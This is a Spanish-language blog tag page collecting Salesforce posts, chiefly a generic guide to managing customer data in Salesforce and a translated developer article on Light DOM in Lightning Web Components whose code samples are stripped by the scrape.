Skip to content

Etiqueta: Plataforma Salesforce

Guía para principiantes sobre el desarrollo de Salesforce ☁️

Guía para principiantes sobre el desarrollo de Salesforce ☁️

Descubrir por dónde empezar puede ser difícil para un nuevo desarrollador, independientemente de la plataforma, pero una buena hoja de ruta puede hacerlo más fácil.

El artículo El desarrollador principiante en la plataforma Salesforce es un buen ejemplo

The post Guía para principiantes para empezar a desarrollar en Salesforce appeared first on Blog de desarrolladores de Salesforce.

Seguir leyendo

Uso de las API de la plataforma Salesforce para acceder a datos de objetos ☁️

Uso de las API de la plataforma Salesforce para acceder a datos de objetos ☁️

La plataforma Salesforce proporciona una gran variedad de API con una amplia gama de funciones para acceder a los datos de su organización. Este blog le ayuda a decidir qué API son las más adecuadas para su caso de uso.

La plataforma Salesforce ofrece una gran variedad de API con una amplia gama de funciones para acceder a los datos de su organización

The post Acceso a datos de objetos con las API de Salesforce Platform appeared first on Blog de desarrolladores de Salesforce.

Seguir leyendo

Uso de Flow, Apex o la API REST para invocar plantillas de avisos ☁️

Uso de Flow, Apex o la API REST para invocar plantillas de avisos ☁️

Gracias a la API Connect REST, no sólo es posible invocar plantillas de avisos de forma programática dentro de la plataforma Salesforce, sino también desde sistemas de terceros.

El artículo Prompt Builder está disponible en inglés

The post Invoque plantillas de avisos desde Flow, Apex o la API REST appeared first on Blog de desarrolladores de Salesforce.

Las plantillas de avisos no sólo se pueden invocar mediante programación dentro de la plataforma Salesforce, sino también desde sistemas de terceros

Seguir leyendo

Capacitación de estudiantes consultores: Un viaje a la certificación de Salesforce

Lea cómo Jen Vision e.V. se asoció con Accenture y Salesforce para capacitar a estudiantes consultores a través de un viaje de certificación de Salesforce.

The post Capacitación de estudiantes consultores: A Salesforce Certification Journey appeared first on Salesforce.

El post Potenciación de estudiantes consultores: Un viaje de certificación de Salesforce

Seguir leyendo

5 términos de IA generativa que todo profesional de ventas debe conocer

Descubra los términos de IA generativa que todo profesional de las ventas debe conocer. Desbloquea el poder de la IA para impulsar tu rendimiento de ventas. Lee más ahora.

The post 5 términos generativos de IA que todo profesional de ventas debe conocer appeared first on Salesforce.

Seguir leyendo

TrailblazerDX ’24 Resumen para desarrolladores: Resumen del evento ☁️

TrailblazerDX '24 Resumen para desarrolladores: Resumen del evento ☁️

Explore un resumen de TrailblazerDX 2024, con lo más destacado de Einstein 1 Studio, Data Cloud y más funciones de IA generativa.

The post Recapitulación de desarrolladores de TrailblazerDX ’24 appeared first on Blog de desarrolladores de Salesforce.

Seguir leyendo

Tendencias en marketing ético – ¿Su tecnología es segura?

Con la IA generativa desbordando la imaginación de los profesionales del marketing, ¿qué podemos hacer para garantizar que nuestra práctica del marketing siga basándose en el pensamiento ético? Leandro Pérez, Vicepresidente Senior y Director de Marketing de Salesforce Asia-Pacífico, comparte sus ideas de primera mano.

Seguir leyendo

35 citas inspiradoras sobre la inteligencia artificial

Las mejores citas sobre IA de expertos en inteligencia artificial sobre el impacto en los negocios, las ventas, la preparación de la fuerza laboral, el futuro del trabajo, la confianza, la ética y la privacidad.

The post 35 citas inspiradoras sobre inteligencia artificial appeared first on Salesforce.

Seguir leyendo

10 preguntas frecuentes sobre la implementación de Salesforce Einstein

¿Qué es Salesforce Einstein? Según la presentación oficial del producto de Salesforce en su sitio web, «Salesforce Einstein es la primera IA integral para CRM. Se trata de un conjunto integrado de tecnologías de IA que hace que la plataforma Customer Success Platform sea más inteligente y lleva la IA a los pioneros de todo el mundo»  Pero, ¿esta breve explicación transmite realmente la profundidad con la que la IA interactúa con […]

El post 10 preguntas frecuentes sobre la implementación de Salesforce Einstein appeared first on Salesforce Ben.

Seguir leyendo

Ahorre tiempo y cierre más acuerdos: Salesforce Sales Cloud es la mejor herramienta para su proceso de ventas

Desde la generación de prospectos hasta el cierre de acuerdos, desvele los secretos de un proceso de ventas de éxito y descubra el poder transformador de Salesforce Sales Cloud.

El post Ahorre tiempo y cierre más acuerdos con Salesforce Sales Cloud

The post Ahorre tiempo y cierre más acuerdos: Salesforce Sales Cloud es la mejor herramienta para su proceso de ventas appeared first on Salesforce.

Consiga ahorrar tiempo y cerrar más operaciones con Salesforce Sales Cloud

Seguir leyendo

Ya puede participar en la encuesta sobre el desarrollo de Salesforce 2024 ☁️

Ya puede participar en la encuesta sobre el desarrollo de Salesforce 2024 ☁️

Comparta sus comentarios y gane 10 dólares participando en la encuesta de 2024, además de ver lo que aprendimos de la encuesta de 2023.

El post La encuesta de Salesforce de 2024

The post La encuesta de desarrollo de Salesforce de 2024 ya está abierta appeared first on Blog de desarrolladores de Salesforce.

Seguir leyendo

Presentación del control de versiones de API a nivel de componente de LWC ☁️

Presentación del control de versiones de API a nivel de componente de LWC ☁️

El versionado de la API de LWC es una excelente forma de garantizar la compatibilidad con versiones anteriores de los componentes existentes y, al mismo tiempo, permitir que los nuevos componentes adopten las nuevas características.

The post Presentación del control de versiones de API a nivel de componente para LWC appeared first on Blog de desarrolladores de Salesforce.

Blog de desarrolladores de Salesforce

Seguir leyendo

Prompt Engineering para desarrolladores de Salesforce: Mejora de la eficacia y la productividad ☁️

Prompt Engineering para desarrolladores de Salesforce: Mejora de la eficacia y la productividad ☁️

Las técnicas de ingeniería generativa, si se hacen bien, pueden ayudarle a hacer las cosas bien, mejor y, lo que es más importante, más rápido.

Las técnicas de ingeniería generativa pueden ayudarle a hacer las cosas bien, mejor y, lo que es más importante, más rápido

The post Ingeniería de prompts para desarrolladores de Salesforce appeared first on Blog de desarrolladores de Salesforce.

Seguir leyendo

De copiloto a coorganizador

Introducción

En los últimos meses he escrito mucho sobre lo que yo llamo Large Action Models, o LAMs, una variación más activa y autónoma de los LLMs que no se limitan a generar contenido como texto o imágenes, sino que realizan tareas completas e incluso participan en flujos de trabajo, ya sea junto a personas

Seguir leyendo

30 preguntas y respuestas de entrevistas a analistas de negocio

La demanda de analistas de negocio de Salesforce ha crecido a un ritmo elevado. Las organizaciones de Salesforce han evolucionado y se han vuelto más complejas. Como resultado, existe una mayor necesidad de evaluar los cambios deseados y obtener una visión completa de la situación, para asegurarse de que todo el mundo está de acuerdo. Esta es la razón por la que las organizaciones deben buscar […]

El post 30 Business Analyst Interview Questions & Answers appeared first on Salesforce Ben.

Seguir leyendo

Guía completa de documentación de Salesforce (en un mundo de inteligencia artificial)

La plataforma Salesforce es muy potente. Con cada nueva versión, su org se vuelve más potente, pero también más compleja. Como le dijeron una vez a Spiderman: «un gran poder conlleva una gran responsabilidad». Entonces, ¿cómo puede asumir la responsabilidad real de mantener su organización? Con todo lo demás que tiene que hacer, documentar sus cambios es probablemente bajo en […]

El post Guía completa para la documentación de Salesforce (en un mundo de IA) appeared first on Salesforce Ben.

Seguir leyendo

5 razones por las que necesita un diccionario de datos de Salesforce

Desde el temor a las imprecisiones en los informes hasta la lucha constante contra los silos de datos y la sombra amenazadora de los incumplimientos, los retos de supervisar sus datos son abundantes. Y no hablemos ya de los quebraderos de cabeza financieros que provocan las malas prácticas de gestión de datos. Mantener un diccionario de datos no es solo marcar una casilla […]

The post 5 razones por las que necesita un diccionario de datos de Salesforce appeared first on Salesforce Ben.

Las razones por las que necesita un diccionario de datos de Salesforce appeared first on Salesforce Ben

Seguir leyendo

Comenzando con Salesforce CDRM: Guía de primeros pasos para optimizar tus procesos de gestión de datos

Introducción

Salesforce CDRM (Customer Data Relationship Management) es una herramienta poderosa que permite a las empresas gestionar y organizar eficientemente sus datos de clientes. En un mundo cada vez más digital, donde la información es clave para el éxito de cualquier negocio, contar con una solución de gestión de datos robusta se ha vuelto fundamental.

En este artículo, exploraremos en detalle qué es Salesforce CDRM y por qué es importante para tu negocio. También discutiremos los pasos necesarios para preparar tu cuenta de Salesforce para la implementación de CDRM, cómo configurar tus objetos y campos de datos, cómo importar y limpiar tus datos, cómo crear reglas de validación y duplicados, cómo definir tus procesos de negocio, cómo automatizar tus procesos de gestión de datos y cómo realizar análisis y reporting de datos. Al final del artículo, entenderás la importancia de implementar Salesforce CDRM en tu negocio y estarás listo para aprovechar al máximo esta herramienta.

¿Qué es Salesforce CDRM y por qué es importante para tu negocio?

Salesforce CDRM es una solución de gestión de datos que permite a las empresas almacenar, organizar y gestionar eficientemente la información de sus clientes. Esta herramienta se basa en la plataforma Salesforce, que es líder en el mercado de CRM (Customer Relationship Management).

La gestión eficiente de los datos del cliente es crucial para cualquier negocio. Los datos son el activo más valioso de una empresa y su correcta gestión puede marcar la diferencia entre el éxito y el fracaso. Salesforce CDRM ofrece una serie de beneficios que ayudan a las empresas a optimizar sus procesos de gestión de datos.

Uno de los principales beneficios de Salesforce CDRM es la centralización de la información del cliente. Con esta herramienta, todas las interacciones con los clientes, como llamadas, correos electrónicos, reuniones y transacciones, se registran y almacenan en un solo lugar. Esto facilita el acceso a la información y permite a los equipos de ventas y marketing tener una visión completa de cada cliente.

Además, Salesforce CDRM ofrece funcionalidades avanzadas de análisis y reporting que permiten a las empresas obtener información valiosa sobre sus clientes. Esto les ayuda a tomar decisiones más informadas y a personalizar sus estrategias de marketing y ventas.

Preparando tu cuenta de Salesforce para CDRM

Antes de implementar Salesforce CDRM, es importante preparar tu cuenta de Salesforce para asegurarte de que esté limpia y organizada. Esto implica eliminar datos duplicados, corregir errores y asegurarse de que los campos estén correctamente etiquetados.

El primer paso para preparar tu cuenta de Salesforce es realizar una auditoría exhaustiva de tus datos existentes. Esto implica revisar todos los registros y eliminar cualquier duplicado o información incorrecta. También debes asegurarte de que todos los campos estén correctamente etiquetados y que la información esté organizada de manera coherente.

Una vez que hayas limpiado tus datos existentes, es importante establecer un proceso para mantener tu cuenta de Salesforce organizada en el futuro. Esto implica establecer reglas y políticas claras para la entrada de datos, así como capacitar a tu equipo en la importancia de mantener la integridad de los datos.

Configurando tus objetos y campos de datos en Salesforce CDRM

En Salesforce CDRM, los objetos son entidades que representan diferentes tipos de registros, como cuentas, contactos, oportunidades y casos. Los campos son atributos de estos objetos que almacenan información específica, como el nombre del cliente, la dirección de correo electrónico y el número de teléfono.

La configuración de los objetos y campos de datos en Salesforce CDRM es fundamental para adaptar la herramienta a las necesidades específicas de tu negocio. Esto implica definir qué objetos y campos son relevantes para tu empresa y cómo se relacionan entre sí.

Por ejemplo, si eres una empresa de comercio electrónico, es posible que desees configurar un objeto de «producto» con campos como el nombre del producto, el precio y la cantidad disponible. También puedes configurar un objeto de «pedido» con campos como el cliente, la fecha del pedido y los productos comprados.

La configuración de los objetos y campos también implica establecer reglas de validación para garantizar que los datos ingresados sean precisos y consistentes. Por ejemplo, puedes establecer una regla de validación que requiera que se ingrese un número de teléfono válido en el campo correspondiente.

Importando tus datos a Salesforce CDRM

Una vez que hayas configurado tus objetos y campos en Salesforce CDRM, es hora de importar tus datos existentes a la plataforma. Es importante seguir las mejores prácticas para garantizar la precisión de los datos durante el proceso de importación.

Antes de importar tus datos, debes asegurarte de que estén limpios y organizados. Esto implica eliminar duplicados, corregir errores y asegurarte de que los campos estén correctamente etiquetados.

Una vez que tus datos estén listos para ser importados, puedes utilizar las herramientas de importación de Salesforce CDRM para cargarlos en la plataforma. Estas herramientas te permiten mapear los campos de tus datos existentes a los campos correspondientes en Salesforce CDRM.

Durante el proceso de importación, es importante verificar la precisión de los datos y corregir cualquier error que se encuentre. También debes asegurarte de que los datos se importen en el formato correcto y que se asignen a los objetos y campos correspondientes.

Limpieza y normalización de datos en Salesforce CDRM

La limpieza y normalización de datos es un paso crucial en la gestión de datos en Salesforce CDRM. Esto implica eliminar duplicados, corregir errores y asegurarse de que los datos estén formateados correctamente.

La limpieza de datos implica eliminar registros duplicados o incorrectos. Esto se puede hacer utilizando las herramientas de deduplicación de Salesforce CDRM, que identifican registros duplicados basados en criterios específicos, como el nombre del cliente o la dirección de correo electrónico.

La normalización de datos implica asegurarse de que los datos estén formateados correctamente y sean consistentes. Esto implica estandarizar la forma en que se ingresan los datos, como las fechas, los números de teléfono y las direcciones. También implica asegurarse de que los campos estén correctamente etiquetados y que la información esté organizada de manera coherente.

La limpieza y normalización de datos es un proceso continuo que debe realizarse regularmente para garantizar la integridad de los datos en Salesforce CDRM. Esto implica establecer reglas y políticas claras para la entrada de datos, así como capacitar a tu equipo en la importancia de mantener la calidad de los datos.

Creando reglas de validación y de duplicados en Salesforce CDRM

Las reglas de validación y duplicados son herramientas poderosas que ayudan a garantizar la precisión y consistencia de los datos en Salesforce CDRM.

Las reglas de validación son reglas que se aplican a los campos de datos para garantizar que los datos ingresados sean precisos y consistentes. Por ejemplo, puedes establecer una regla de validación que requiera que se ingrese un número de teléfono válido en el campo correspondiente.

Las reglas de duplicados son reglas que se aplican a los registros para identificar y prevenir registros duplicados. Por ejemplo, puedes establecer una regla de duplicados que identifique registros duplicados basados en criterios específicos, como el nombre del cliente o la dirección de correo electrónico.

La creación y personalización de reglas de validación y duplicados en Salesforce CDRM es fundamental para garantizar la calidad de los datos. Esto implica definir las reglas que son relevantes para tu negocio y configurarlas en la plataforma.

Definiendo tus procesos de negocio en Salesforce CDRM

La definición de tus procesos de negocio en Salesforce CDRM es fundamental para garantizar una gestión eficiente de los datos. Esto implica establecer flujos de trabajo claros y personalizados que reflejen tus procesos empresariales.

Los flujos de trabajo en Salesforce CDRM son secuencias automatizadas de tareas y acciones que se activan en función de eventos específicos. Por ejemplo, puedes configurar un flujo de trabajo que envíe automáticamente un correo electrónico de seguimiento a un cliente después de una reunión.

La definición y personalización de tus procesos de negocio en Salesforce CDRM te permite automatizar tareas repetitivas y garantizar que se sigan los pasos correctos en cada interacción con el cliente. Esto ayuda a mejorar la eficiencia y la consistencia de tus procesos empresariales.

Automatizando tus procesos de gestión de datos con Salesforce CDRM

La automatización de los procesos de gestión de datos es otro beneficio clave de Salesforce CDRM. Esto implica utilizar herramientas como flujos de trabajo y el generador de procesos para automatizar tareas y acciones.

Los flujos de trabajo en Salesforce CDRM te permiten automatizar tareas repetitivas y garantizar que se sigan los pasos correctos en cada interacción con el cliente. Por ejemplo, puedes configurar un flujo de trabajo que envíe automáticamente un correo electrónico de seguimiento a un cliente después de una reunión.

El generador de procesos en Salesforce CDRM te permite crear procesos empresariales personalizados que se activan en función de eventos específicos. Por ejemplo, puedes configurar un proceso que se active cuando se crea una nueva oportunidad de venta y que envíe automáticamente una notificación al equipo de ventas.

La automatización de los procesos de gestión de datos en Salesforce CDRM ayuda a mejorar la eficiencia y la consistencia de tus operaciones comerciales. También te permite ahorrar tiempo y recursos al eliminar tareas manuales y repetitivas.

Análisis y reporting de datos en Salesforce CDRM

El análisis y reporting de datos es fundamental para tomar decisiones informadas y personalizar tus estrategias de marketing y ventas. Salesforce CDRM ofrece una serie de herramientas avanzadas que te permiten realizar análisis detallados y crear informes personalizados.

Las herramientas de análisis en Salesforce CDRM te permiten realizar análisis de datos en tiempo real y obtener información valiosa sobre tus clientes. Por ejemplo, puedes analizar las tendencias de compra de tus clientes y utilizar esta información para personalizar tus ofertas y promociones.

Las herramientas de reporting en Salesforce CDRM te permiten crear informes personalizados que reflejen tus necesidades empresariales. Puedes crear informes que muestren métricas clave, como el número de oportunidades de venta cerradas o el retorno de la inversión en marketing.

El análisis y reporting de datos en Salesforce CDRM te ayuda a tomar decisiones más informadas y a optimizar tus estrategias de marketing y ventas. También te permite identificar áreas de mejora y realizar cambios necesarios en tus procesos empresariales.

Mejorando continuamente tus procesos de gestión de datos con Salesforce CDRM

La mejora continua es fundamental en la gestión de datos en Salesforce CDRM. Esto implica utilizar la herramienta para identificar áreas de mejora y realizar los cambios necesarios en tus procesos empresariales.

Salesforce CDRM ofrece una serie de herramientas que te permiten realizar un seguimiento del rendimiento de tus procesos de gestión de datos. Puedes utilizar informes y paneles personalizados para analizar métricas clave, como la precisión de los datos y la eficiencia del proceso.

Una vez que hayas identificado áreas de mejora, puedes utilizar las herramientas de configuración y automatización en Salesforce CDRM para realizar los cambios necesarios en tus procesos empresariales. Por ejemplo, puedes ajustar las reglas de validación o crear nuevos flujos de trabajo para mejorar la calidad y eficiencia de tus operaciones comerciales.

La mejora continua en la gestión de datos en Salesforce CDRM te ayuda a optimizar tus procesos empresariales y a mantener la calidad de tus datos a largo plazo. También te permite adaptarte a los cambios en el mercado y a las necesidades cambiantes de tus clientes.

Conclusión

En resumen, Salesforce CDRM es una herramienta poderosa que permite a las empresas gestionar y organizar eficientemente sus datos de clientes. Esta herramienta ofrece una serie de beneficios, como la centralización de la información del cliente, la personalización de los procesos empresariales y la automatización de tareas repetitivas.

Para aprovechar al máximo Salesforce CDRM, es importante preparar tu cuenta de Salesforce, configurar tus objetos y campos de datos, importar y limpiar tus datos, crear reglas de validación y duplicados, definir tus procesos de negocio, automatizar tus procesos de gestión de datos y realizar análisis y reporting de datos.

Implementar Salesforce CDRM en tu negocio te ayudará a mejorar la eficiencia y la consistencia de tus operaciones comerciales, tomar decisiones más informadas y personalizar tus estrategias de marketing y ventas. No pierdas más tiempo y comienza a utilizar Salesforce CDRM para una mejor gestión de datos en tu negocio.
Si estás interesado en aprender más sobre el mundo de las remesas, te recomendamos leer nuestro artículo «¿Qué es una remesa?» en el que explicamos qué son las remesas y cómo funcionan. También puedes encontrar información útil sobre otros temas relacionados como el IBAN, el Reglamento General de Protección de Datos, el ciclo de vida del producto, las tarjetas de débito, SEPA, los holdings y muchas otras temáticas relevantes. ¡No te lo pierdas!

Cómo aprobar el examen de certificación Salesforce Certified AI Associate

Cómo aprobar el examen de certificación Salesforce Certified AI Associate

Última actualización el 7 de septiembre de 2023 por Rakesh Gupta Como nuevo Salesforce Certified AI Associate, comparto mis experiencias de estudio contigo y quiero que seas el próximo en superarlo Así que, ¡prepárese y sumérjase! 👉 Ya que estás aquí, es posible que desees

El post Cómo aprobar el examen de certificación Salesforce Certified AI Associate appeared first on Campeón de la Automatización.

Cómo aprobar el examen de certificación Salesforce Certified AI Associate appeared first on Campeón de la Automatización

Seguir leyendo

Desmitificando Light DOM y sus casos de uso ☁️

Desmitificando Light DOM y sus casos de uso ☁️

Esta es una traducción que desde EGA Futura ofrecemos como cortesía a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoamérica .

El enlace a la publicación original, lo encontrarás al final de este artículo.

Desmitificando Light DOM y sus casos de uso | Blog de desarrolladores de Salesforce

Light DOM es una función de Lightning Web Components que ha estado disponible de forma general en Lightning Experience, Experience Cloud, LWC OSS (código abierto) y todas las versiones de la aplicación móvil Salesforce desde Summer '23 .

Los componentes web Lightning, de forma predeterminada, se representan en DOM oculto , lo que proporciona una encapsulación y seguridad sólidas para sus componentes. Sin embargo, al mismo tiempo, evita el estilo global y bloquea las integraciones de terceros que introspeccionan el interior de sus componentes. Light DOM es una característica que se puede habilitar de forma granular en componentes seleccionados, de modo que Shadow DOM no los afecte.

¿Cómo funciona el DOM ligero?

Usemos un componente web Lightning muy simple como ejemplo.

holaCodey.html

<dx-code-block title language="html" code-block="

Hello Codey!

«>

holaCodey.js

En el ejemplo anterior, el DOM oculto predeterminado del componente evita que una regla CSS definida en el componente principal o el host alcance el elemento <p> . Además, no permite que el código JavaScript externo al componente consulte el elemento <p> mediante las API de consulta del navegador.

Para activar el DOM ligero para un componente, debe especificar el renderMode ligero en su archivo JavaScript y la directiva de plantilla lwc:render-mode en la etiqueta <template> del componente. Ambos cambios son necesarios debido a la forma en que se compilan los componentes web Lightning.

holaCodey.html

<dx-code-block title language="html" code-block="

Hello Codey!

«>

holaCodey.js

Cuando activa el DOM claro en un componente, el marcado del componente se adjunta al elemento anfitrión en lugar de a su árbol de sombra. Luego puede acceder al marcado desde otros componentes de la página como cualquier otro contenido en el host del documento que no esté protegido por Shadow DOM.

Los componentes DOM ligeros permiten el uso de API de consulta de navegador estándar como querySelector y querySelectorAll . En este caso, en lugar de usar this.template.querySelector , debes usar this.querySelector .

holaCodey.js

O más simplemente, a menudo puedes usar la directiva lwc:ref en ambos casos (componentes DOM sombreados y claros) y omitir el querySelector .

holaCodey.html

<dx-code-block title language="html" code-block="

Hello Codey!

«>

holaCodey.js

Cuándo usarlo y cuándo no usarlo

Light DOM es una opción para cada componente individual. Sus efectos no se aplicarán a otros componentes a menos que también opten por participar. Tenga en cuenta que los componentes base siempre se representan en DOM oculto.

Recomendamos habilitar DOM ligero si tiene bibliotecas que necesitan acceder a los componentes internos mediante API de consulta de navegador estándar, aplicar estilos globales o necesita más flexibilidad para implementar las mejores prácticas de accesibilidad, siempre y cuando el componente no exponga datos confidenciales. Cubriremos estos casos de uso con más profundidad en la siguiente sección.

No recomendamos habilitar DOM ligero para un componente si ese componente aparece o funciona con datos confidenciales. El uso de DOM ligero elimina la encapsulación de DOM en sombra y expone los componentes al raspado de DOM. Por lo tanto, tenga en cuenta esta importante consideración.

Casos de uso habilitados por DOM ligero

Light DOM permite varios casos de uso que anteriormente no eran compatibles.

1) Soporte de bibliotecas que necesitan acceso a las partes internas de un componente

Light DOM permite el uso de bibliotecas que necesitan acceso a los componentes internos. Un buen ejemplo de esto son las bibliotecas de análisis utilizadas en los sitios de Experience Cloud, como Google Analytics, ya que necesitan acceso a los componentes internos para obtener mejores resultados.

Podemos probar este caso de uso, incluido el componente helloCodey anterior, en un componente principal mascotChanger de la siguiente manera.

mascotChanger.html

<dx-code-block title language="html" code-block="
«>

mascotChanger.js

Tenga en cuenta que, aunque el párrafo consultado pertenece al componente helloCodey , podemos acceder a él con this.template.querySelector , porque pertenece al DOM ligero secundario. Sin embargo, si el componente helloCodey no tuviera habilitado el DOM ligero, querySelector habría devuelto null .

También puede acceder a los componentes internos del DOM ligero desde un script que se carga como un recurso estático en la página, siempre y cuando todos los componentes ancestros estén habilitados para el DOM ligero. Por ejemplo, en un sitio LWR Experience Cloud, que es DOM completamente ligero, puede agregar un recurso estático de JavaScript que encuentre los componentes internos helloCodey de la siguiente manera.

myJSResource.js

2) Implementación más sencilla de componentes profundamente anidados

Otro ejemplo en el que esto puede resultar útil es implementar componentes complejos y profundamente anidados. En ese caso, es posible que prefiera tener un único componente DOM de sombra en el nivel superior y componentes DOM claros dentro para evitar gastos generales. Por ejemplo, un componente de tabla de datos personalizado puede tener solo un gran componente DOM de sombra alrededor de todo, en lugar de una sombra para cada fila y celda de la tabla.

Esta implementación facilita la consulta de sus propios elementos desde el componente de nivel superior de su jerarquía y también la implementación de la accesibilidad. Además, hay una ligera mejora en el rendimiento en algunos casos de uso al usar DOM claro sobre DOM sombreado, lo que se debe principalmente a la sobrecarga de simplemente crear nodos de sombra adicionales.

3) Estilo global

Light DOM también facilita el estilo global, ya que permite que los estilos CSS caigan en cascada en el marcado del componente. Por ejemplo, un componente DOM ligero puede establecer un estilo que se carga y luego se aplica una vez para todos los componentes DOM ligeros de la página. La inyección de estilos globales a través de DOM ligero solo se admite en sitios de Experience Cloud, editor de contenido CMS o Sales Enablement.

Por ejemplo, definamos un componente colorChanger de la siguiente manera.

colorChanger.html

<dx-code-block title language="html" code-block="
«>

colorChanger.js

colorChanger.css

El color de fondo azul se aplicará a los párrafos de todas las instancias del componente helloCodey en la página, ya que está habilitado para DOM claro.

En la mayoría de los casos, no querrás que tu estilo se filtre a otros componentes. Eso todavía es posible para componentes DOM ligeros. Solo necesita colocar esas reglas de estilo en un archivo *.scoped.css , para que tengan como alcance el componente DOM ligero. El CSS con alcance está escrito exactamente igual que el CSS normal, pero solo se aplicará a ese componente sin filtrarse.

Tenga en cuenta que si las reglas de estilo se cargan globalmente como recursos estáticos en una página de Lightning Experience o un sitio de Experience Cloud, se les quitará el alcance y se aplicarán tanto a los componentes DOM claros como también a los componentes DOM de sombra, ya que la sombra sintética no evitará que se filtren. Esta es una limitación que se solucionará una vez que la sombra nativa sea totalmente compatible (actualmente en Developer Preview ). Cuando la sombra nativa está habilitada, solo los componentes habilitados para DOM claro heredarán los estilos globales.

4) Implementación más flexible de las mejores prácticas de accesibilidad

Light DOM permite que un componente haga referencia a la i d un elemento que vive en otro componente separado habilitado para Light DOM. Esto le permite vincular dos elementos utilizando los atributos i d y aria , lo que le otorga flexibilidad adicional para implementar las mejores prácticas de accesibilidad en sus proyectos. Mejoremos nuestro componente mascotChanger para demostrar esto.

mascotChanger.html

<dx-code-block title language="html" code-block="

«>

mascotChanger.js

mascotaNombreInput.html

<dx-code-block title language="html" code-block="

«>

mascotaNombreEtiqueta.html

<dx-code-block title language="html" code-block="

«>

Tenga en cuenta que Salesforce está trabajando actualmente con el W3C para agregar nuevos estándares, de modo que el DOM oculto nativo pueda participar en estos patrones de accesibilidad. Esto significa que, en el futuro, este caso de uso ligero de DOM no será necesario. Como parte de nuestros esfuerzos de accesibilidad, también patrocinamos a Igalia para implementar parcialmente ARIA Element Reflection , que ahora es totalmente compatible con Safari y parcialmente con Chrome. Si quieres saber más sobre este tema, echa un vistazo a nuestra propuesta cross-root-aria , el repositorio para el grupo de trabajo Modelo de objetos de accesibilidad .

La siguiente tabla resume los casos de uso y dónde se admiten.

Experiencia en la nube Experiencia relámpago Aplicaciones móviles de Salesforce LWC OSS/LWR en Node.js*
Soporte de bibliotecas que necesitan acceso a las partes internas de los componentes.
Implementación más sencilla de componentes profundamente anidados
Estilo global No No
Implementación más flexible de las mejores prácticas de accesibilidad

*Si se utiliza DOM de sombra nativo en lugar de sombra sintética . La sombra nativa es la opción predeterminada para LWC OSS y LWR en Node.js.

Otras Consideraciones

Cuando se trabaja con DOM ligero, hay algunas consideraciones adicionales a tener en cuenta, entre ellas:

  • Los eventos no se reorientan con DOM ligero. Lea más en la guía para desarrolladores .
  • No hay soporte de navegador para espacios fuera del DOM oculto, por lo que se emula. Esto implica que algunas funciones, como los enlaces de ciclo de vida, no están disponibles en ellos. Eche un vistazo a la documentación para saber más.
  • Por ahora, los componentes ligeros habilitados para DOM no se pueden empaquetar.

Conclusión

En esta publicación de blog, revisamos qué es el DOM ligero, los casos de uso que permite y las consideraciones a tener en cuenta para decidir qué componentes habilitarán la función. Todos los ejemplos que se muestran en este blog se encuentran en un repositorio de GitHub que puedes probar tú mismo.

Para obtener más información sobre DOM ligero en la plataforma Salesforce, lea la documentación o, si está trabajando fuera de la plataforma, lea la documentación OSS .

Si decide seguir adelante y transformar sus componentes DOM ocultos en componentes DOM claros, consulte esta herramienta creada por Salesforce Engineering para simplificar la migración.

Sobre el Autor

Alba Rivas trabaja como Principal Developer Advocate en Salesforce. Puedes seguirla en Linkedin , Twitter o GitHub .

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

Añadir a holgura Suscríbete a RSS

Seguir leyendo

Genere confianza con sus clientes en la era de la IA

Genere confianza con sus clientes en la era de la IA

En una era dominada por la IA, la importancia de la confianza ha alcanzado nuevas alturas. A medida que los líderes de la industria navegan a través de la disrupción y la innovación, establecer y fomentar la confianza con los empleados y clientes es más que una necesidad. Es un imperativo estratégico.

La IA generativa tiene el potencial de aportar hasta 4,4 billones de dólares anuales a la economía mundial. Esto muestra el impacto monumental que la IA puede tener en varios sectores. Y la IA tiene la capacidad de automatizar el 40% de la jornada laboral promedio . Teniendo esto en cuenta, no podemos subestimar la influencia de la IA en la optimización de los procesos y la eficiencia. Es hora de reconocer el poder que tiene la IA confiable para mejorar la experiencia del cliente. Esto, a su vez, enfatiza la importancia de generar y mantener la confianza.

Cubriremos cómo podemos utilizar el papel esencial de la confianza en la adopción de plataformas de IA . También exploraremos cómo los beneficios de la IA pueden generar (y fortalecer) la confianza de los clientes.

Comience con AI Coach

Los servicios profesionales de Salesforce pueden ayudarle a establecer las bases adecuadas para el éxito con nuestro nuevo paquete, AI Coach.

La búsqueda de una IA confiable

Vivimos en un mundo donde tanto las empresas como los clientes cuestionan la confiabilidad de la IA . Esto es especialmente cierto cuando a la IA se le confía el activo más sensible: los datos de los clientes. De hecho, el 78% de los clientes dicen que cambiarían de proveedor de servicios financieros si sintieran que sus datos fueron mal manejados. Para las empresas, esto resalta la importancia crítica de salvaguardar la información de los clientes.

Pero ¿y si le dijéramos que la IA no tiene por qué ser un obstáculo para la confianza? ¿Que en realidad puede ser el puente que conecte a las empresas y sus clientes sobre una base de IA confiable? Sí, lo leiste bien. La adopción de la IA ha aumentado un 88 % entre 2020 y 2022, lo que demuestra el creciente reconocimiento del potencial de una IA confiable para crear impactos positivos y al mismo tiempo mantener la confianza.

Los cuatro pilares de la confianza

Antes de profundizar en las formas en que la IA puede moldear la confianza, analicemos los cuatro pilares esenciales sobre los que se construye la confianza. Estos pilares desempeñan un papel vital a la hora de establecer una base de IA confiable en la que los clientes puedan confiar.

  • Competencia: el núcleo de la confianza reside en la capacidad de ofrecer resultados, no promesas. Para aclarar, su plataforma de IA no sólo debe ser experta en resolver problemas, sino también ser capaz de demostrar su eficacia.
  • Fiabilidad: la coherencia es clave. Una IA confiable debe cumplir constantemente las expectativas y cumplir los compromisos, creando una sensación de confiabilidad.
  • Integridad: la transparencia y la honestidad forman la base de la confianza. Asimismo, es crucial abordar las limitaciones y los riesgos potenciales de manera abierta y ética.
  • Intención: Alinear sus propias motivaciones con el éxito del cliente muestra una dedicación genuina a sus necesidades y objetivos.

Fomentar la confianza a través de la IA

Ahora que entendemos los cuatro pilares de la confianza, vamos a aprovecharlos y ver cómo podemos fomentar la confianza con la IA. ¿Cómo podemos tomar la IA, que a menudo se considera un disruptor, y convertirla en el aliado que refuerza la confianza y la lealtad ? Exploremos algunos escenarios.

Demostrar competencia:

  • Comparta historias de éxito: muestre el impacto de su plataforma de IA a través de estudios de casos convincentes y ejemplos del mundo real. Por ejemplo, resalte los desafíos que enfrentaron sus clientes y cómo su plataforma brindó soluciones innovadoras. Estas historias de éxito actúan como testimonio de su competencia.
  • Visualice resultados: utilice la visualización de datos para traducir resultados complejos en imágenes claras y comprensibles. Podrá demostrar la eficacia de su plataforma y también mejorar la comprensión del cliente.

